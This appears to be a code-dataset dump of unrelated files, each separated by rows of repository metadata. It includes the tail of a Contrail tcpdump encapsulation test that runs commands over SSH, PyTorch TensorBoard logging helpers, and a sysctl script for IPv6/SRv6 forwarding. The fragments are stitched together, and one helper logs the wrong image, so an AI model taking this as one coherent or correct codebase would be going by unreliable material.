'source_network': vn2_name,
'dest_network': vn1_name,
},
]
policy1_fixture = self.useFixture(
PolicyFixture(
policy_name=policy1_name,
rules_list=rules,
inputs=self.inputs,
connections=self.connections))
policy2_fixture = self.useFixture(
PolicyFixture(
policy_name=policy2_name,
rules_list=rev_rules,
inputs=self.inputs,
connections=self.connections))
self.logger.info('Apply policy between VN %s and %s' %
(vn1_name, vn2_name))
vn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], vn1_fixture.vn_id)
self.addCleanup(
vn1_fixture.unbind_policies, vn1_fixture.vn_id, [
policy1_fixture.policy_fq_name])
vn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], vn2_fixture.vn_id)
self.addCleanup(
vn2_fixture.unbind_policies, vn2_fixture.vn_id, [
policy2_fixture.policy_fq_name])
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
self.logger.info(
'Checking connectivity within VNS cluster through Policy')
self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
vm2_fixture.vm_ip,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
comp_vm2_ip = vm2_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'UDP')
self.tcpdump_analyze_on_compute(comp_vm2_ip, 'UDP')
self.logger.info(
'Checking connectivity outside VNS cluster through FIP')
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
if not result:
self.logger.error(
'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed')
assert result
self.logger.info('Now changing the encapsulation priorities')
self.logger.info(
'The new encapsulation will take effect once bug 1422 is fixed')
res = self.connections.update_vrouter_config_encap(
'MPLSoGRE', 'MPLSoUDP', 'VXLAN')
self.logger.info('Updated.%s' % (res))
self.logger.info(
'Checking connectivity within VNS cluster through Policy')
self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
vm2_fixture.vm_ip,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
comp_vm2_ip = vm2_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
self.tcpdump_analyze_on_compute(comp_vm2_ip, 'GRE')
self.logger.info(
'Checking connectivity outside VNS cluster through FIP')
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
if not result:
self.logger.error(
'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed after changing the encapsulation')
assert result
else:
self.logger.info(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
raise self.skipTest(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
return True
# end test_apply_policy_fip_vn_with_encaps_change_gw_mx
# end TestEncapsulation
#
def start_tcpdump(self, session, cmd, pcap=None):
self.logger.info("Starting tcpdump to capture the packets.")
result = execute_cmd(session, cmd, self.logger)
if pcap:
assert check_pcap_file_exists(session, pcap),'pcap not got created'
# end start_tcpdump
def stop_tcpdump(self, session):
self.logger.info("Stopping any tcpdump process running")
cmd = 'kill $(pidof tcpdump)'
execute_cmd(session, cmd, self.logger)
self.logger.info("Removing any encap-pcap files in /tmp")
cmd = 'rm -f /tmp/encap*pcap'
execute_cmd(session, cmd, self.logger)
# end stop_tcpdump
def tcpdump_start_on_all_compute(self):
for compute_ip in self.inputs.compute_ips:
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
inspect_h = self.agent_inspect[compute_ip]
comp_intf = inspect_h.get_vna_interface_by_type('eth')
if len(comp_intf) >= 1:
comp_intf = comp_intf[0]
self.logger.info('Agent interface name: %s' % comp_intf)
pcap1 = '/tmp/encap-udp.pcap'
pcap2 = '/tmp/encap-gre.pcap'
pcap3 = '/tmp/encap-vxlan.pcap'
cmd1 = 'tcpdump -ni %s udp port 6635 -w %s -s 0' % (
comp_intf, pcap1)
cmd_udp = "nohup " + cmd1 + " >& /dev/null < /dev/null &"
cmd2 = 'tcpdump -ni %s proto 47 -w %s -s 0' % (comp_intf, pcap2)
cmd_gre = "nohup " + cmd2 + " >& /dev/null < /dev/null &"
cmd3 = 'tcpdump -ni %s dst port 4789 -w %s -s 0' % (
comp_intf, pcap3)
cmd_vxlan = "nohup " + cmd3 + " >& /dev/null < /dev/null &"
self.start_tcpdump(session, cmd_udp, pcap1)
self.start_tcpdump(session, cmd_gre, pcap2)
self.start_tcpdump(session, cmd_vxlan, pcap3)
#just to make sure tcpdump starts listening
sleep(5)
# end tcpdump_on_all_compute
def tcpdump_stop_on_all_compute(self):
sessions = {}
for compute_ip in self.inputs.compute_ips:
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
# end tcpdump_on_all_compute
def tcpdump_stop_on_compute(self, compute_ip):
sessions = {}
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
def tcpdump_analyze_on_compute(
self,
comp_ip,
pcaptype,
vxlan_id=None,
vlan_id=None):
sleep(2)
sessions = {}
compute_user = self.inputs.host_data[comp_ip]['username']
compute_password = self.inputs.host_data[comp_ip]['password']
session = ssh(comp_ip, compute_user, compute_password)
self.logger.info("Analyzing on compute node %s" % comp_ip)
if pcaptype == 'UDP':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
if count2 != 0 and count3 == 0:
self.logger.info(
"%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen as expected" %
(count2, count3))
return True
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected" % (
count2, count3)
self.logger.error(errmsg)
assert False, errmsg
elif pcaptype == 'GRE':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
if count2 == 0 and count3 != 0:
self.logger.info(
"%s GRE encapsulated packets are seen and %s UDP encapsulated packets are seen as expected" %
(count3, count2))
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
return True
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected" % (
count2, count3)
self.logger.error(errmsg)
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
assert False, errmsg
elif pcaptype == 'VXLAN':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
pcaps3 = '/tmp/encap-vxlan.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
cmd3 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps3
out3, err = execute_cmd_out(session, cmd3, self.logger)
count = int(out3.strip('\n'))
if count2 == 0 and count3 == 0 and count != 0:
self.logger.info(
"%s GRE encapsulated packets are seen and %s UDP encapsulated packets are seen and %s vxlan packets are seen as expected" %
(count3, count2, count))
# self.tcpdump_stop_on_all_compute()
if vxlan_id is not None:
cmd4 = 'tcpdump -AX -r %s | grep ' % pcaps3 + \
vxlan_id + ' |wc -l'
out4, err = execute_cmd_out(session, cmd4, self.logger)
count_vxlan_id = int(out4.strip('\n'))
if count_vxlan_id < count:
errmsg = "%s vxlan packet are seen with %s vxlan_id . Not Expected . " % (
count, count_vxlan_id)
self.tcpdump_stop_on_compute(comp_ip)
self.logger.error(errmsg)
assert False, errmsg
else:
self.logger.info(
"%s vxlan packets are seen with %s vxlan_id as expexted . " %
(count, count_vxlan_id))
self.tcpdump_stop_on_compute(comp_ip)
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected, %s vxlan packet seen" % (
count2, count3, count)
self.logger.error(errmsg)
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
assert False, errmsg
if vlan_id is not None:
cmd5 = 'tcpdump -AX -r %s | grep %s |wc -l' % (pcaps3, vlan_id)
out5, err = execute_cmd_out(session, cmd5, self.logger)
count_vlan_id = int(out5.strip('\n'))
if count_vlan_id < count:
errmsg = "%s vxlan packet are seen with %s vlan_id . Not Expected . " % (
count, count_vlan_id)
self.logger.error(errmsg)
assert False, errmsg
else:
self.logger.info(
"%s vxlan packets are seen with %s vlan_id as expexted . " %
(count, count_vlan_id))
return True
# return True
# end tcpdump_analyze_on_compute
#
| 44.825231 | 184 | 0.554985 | 4,307 | 38,729 | 4.735315 | 0.090318 | 0.048541 | 0.033636 | 0.025742 | 0.86786 | 0.854082 | 0.83849 | 0.819171 | 0.806227 | 0.794263 | 0 | 0.016957 | 0.3635 | 38,729 | 863 | 185 | 44.877173 | 0.810393 | 0.040202 | 0 | 0.823841 | 0 | 0.002649 | 0.145801 | 0.001132 | 0 | 0 | 0 | 0.001159 | 0.046358 | 1 | 0.01457 | false | 0.017219 | 0.022517 | 0 | 0.046358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4382ec618cee3bfdd183fce97282f59a4fd8e254 | 121 | py | Python | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | null | null | null | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | null | null | null | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | 3 | 2020-04-12T04:43:24.000Z | 2021-11-30T02:01:02.000Z | from __future__ import absolute_import
from .animals import Animal
from .animals import Cat
from .animals import JOBRANK | 24.2 | 38 | 0.842975 | 17 | 121 | 5.705882 | 0.470588 | 0.340206 | 0.525773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132231 | 121 | 5 | 39 | 24.2 | 0.92381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
43cbcddf89d293a4c44b5ed6c5d82901b3ad72b4 | 108 | py | Python | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | from solutions.HLO import hello
def test_hello_world_r2():
assert hello("random") == "Hello, random!"
| 18 | 46 | 0.712963 | 15 | 108 | 4.933333 | 0.733333 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.157407 | 108 | 5 | 47 | 21.6 | 0.802198 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
605a34d901177b5a9ac1e747be53772dc41c8722 | 11,188 | py | Python | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | import torch
import torchvision
import numpy as np
import matplotlib.pylab as plt
def calculate_accuracy_binary(outputs, targets):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
hit = ((outputs > 0.5) == targets).sum()
#hit = sum(abs(outputs-targets))
tsum = targets.shape[0]
return (hit + 1e-8) / (tsum + 1e-8)
def calculate_accuracy(outputs, targets):
#outputs = outputs.data.cpu().numpy().flatten()
#targets = targets.data.cpu().numpy().flatten()
max_vals, max_indices = torch.max(outputs, 1)
acc = (max_indices == targets.long()).sum().data.cpu().numpy() / max_indices.size()[0]
return acc
def image_cat(inputs,bs):
data=[]
for h in range(bs):
data.append(inputs[h, :, :, :])
data = [x for x in data]
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True,
range=None, scale_each=True)
return data_all
def add_image_unet(inputs,masks,est_maps,outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data_all = image_cat(inputs,targets.shape[0])
mask_all = image_cat(masks, targets.shape[0])
estmaps_all = image_cat(est_maps, targets.shape[0])
if subset == 'val':
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
else:
writer.add_image(subset + '_step_' + str(epoch ),img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image_3d(inputs, outputs, targets, writer, subset, epoch,name):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data = []
for h in range(targets.shape[0]):
data.append(inputs[h, :, :, :])
data = [x for x in data]
# data = torch.cat(data, dim=0)
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True, range=None, scale_each=True)
# if subset == 'val':
# writer.add_image(subset + '_step_' + str(epoch) + '/Diff_'+str(sum(sum(abs(outputs-targets)))) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
# img_tensor=data_all, global_step=epoch, dataformats='CHW')
if subset == 'val':
# print('val image added')
writer.add_image(subset + '_step_' + str(epoch) +'/'+ name + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
else:
# print('train image added')
writer.add_image(subset + '_step_' + str(epoch )+'/'+name,img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image(inputs, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data = []
data.append(inputs[h, :, :, :])
data = [x for x in data]
data = torch.cat(data, dim=1)
data_all = torchvision.utils.make_grid(data, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_gl_image(images,patches, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
def add_gld_image(images,patches,details, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '/diff_' + str(abs(outputs[h] - targets[h])) + '_d_/gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch, dataformats='CHW')
def add_gl_image_index(images, patches, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
def add_gld_image_index(images, patches, details, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(
index) + '/d_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch,
dataformats='CHW')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
| 51.321101 | 220 | 0.586074 | 1,512 | 11,188 | 4.125661 | 0.080026 | 0.028855 | 0.03655 | 0.057711 | 0.882975 | 0.880571 | 0.873677 | 0.863097 | 0.847227 | 0.847227 | 0 | 0.007375 | 0.24857 | 11,188 | 217 | 221 | 51.557604 | 0.734626 | 0.05926 | 0 | 0.702247 | 0 | 0 | 0.045394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073034 | false | 0 | 0.022472 | 0 | 0.117978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7147ddf388272f77df8e5b82feaafae0f45ab050 | 206 | py | Python | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | 3 | 2021-03-11T08:34:24.000Z | 2021-07-19T06:53:02.000Z | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | null | null | null | utilss/layers.py | EliotZhu/CDSM | 69d8ba69202300b5d520ee25298d3d697b8f31f1 | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Masking, Layer
from tensorflow.keras import initializers
| 18.727273 | 64 | 0.834951 | 27 | 206 | 6.148148 | 0.592593 | 0.253012 | 0.343373 | 0.301205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.131068 | 206 | 10 | 65 | 20.6 | 0.927374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
715d9803814ffaca8f731f20bbb18bcf26f1be62 | 236 | py | Python | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 5 | 2021-08-09T08:16:55.000Z | 2022-02-08T16:56:53.000Z | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 1 | 2021-08-07T07:45:52.000Z | 2021-08-07T07:45:52.000Z | transparentemail/services/__init__.py | fossabot/TransparentEmail | 64f364e0f09f84502609650efd727ddd7efa285a | [
"MIT"
] | 1 | 2021-08-07T07:43:54.000Z | 2021-08-07T07:43:54.000Z | from transparentemail.services.www33MailCom import Www33MailCom
from transparentemail.services.gmailCom import GmailCom
from transparentemail.services.yahooCom import YahooCom
from transparentemail.services.outlookCom import OutlookCom
| 47.2 | 63 | 0.898305 | 24 | 236 | 8.833333 | 0.333333 | 0.377358 | 0.528302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0.067797 | 236 | 4 | 64 | 59 | 0.945455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
71b8b3007a11569a19a8e364f2e1fb851166c823 | 739 | py | Python | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/tine | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 31 | 2019-02-22T10:06:18.000Z | 2022-02-28T10:59:31.000Z | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/goodns | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 5 | 2018-12-23T12:34:27.000Z | 2019-12-11T09:25:30.000Z | projects/frr_dev_4node/docker/enable_seg6_router.py | slankdev/goodns | 7901b07f4a5e574a4c8782517d63add666e98e20 | [
"Apache-2.0"
] | 6 | 2018-12-28T00:05:05.000Z | 2020-10-10T14:10:25.000Z | #!/usr/bin/env python3
import os
print('#!/bin/sh')
print('sysctl -w net.ipv6.conf.all.forwarding=1')
print('sysctl -w net.ipv6.conf.all.disable_ipv6=0')
print('sysctl -w net.ipv6.conf.all.seg6_enabled=1')
print('sysctl -w net.ipv4.conf.all.rp_filter=0')
print('sysctl -w net.ipv6.conf.default.forwarding=1')
print('sysctl -w net.ipv6.conf.default.disable_ipv6=0')
print('sysctl -w net.ipv6.conf.default.seg6_enabled=1')
print('sysctl -w net.ipv4.conf.default.rp_filter=0')
ifs = os.listdir(path='/sys/class/net')
for iface in ifs:
print('sysctl -w net.ipv6.conf.{}.disable_ipv6=0'.format(iface))
print('sysctl -w net.ipv6.conf.{}.seg6_enabled=1'.format(iface))
print('sysctl -w net.ipv4.conf.{}.rp_filter=0'.format(iface))
| 36.95 | 68 | 0.717185 | 131 | 739 | 3.977099 | 0.251908 | 0.232246 | 0.253359 | 0.316699 | 0.721689 | 0.721689 | 0.547025 | 0.472169 | 0.268714 | 0 | 0 | 0.04271 | 0.081191 | 739 | 19 | 69 | 38.894737 | 0.724595 | 0.028417 | 0 | 0 | 0 | 0 | 0.678322 | 0.492308 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0.8 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
e08fde76a90b5aebaa6f11db7bf7adc369bea35c | 7,015 | py | Python | tests.py | logston/py3s3 | 1910ca60c53a53d839d6f7b09c05b555f3bfccf4 | [
"BSD-3-Clause"
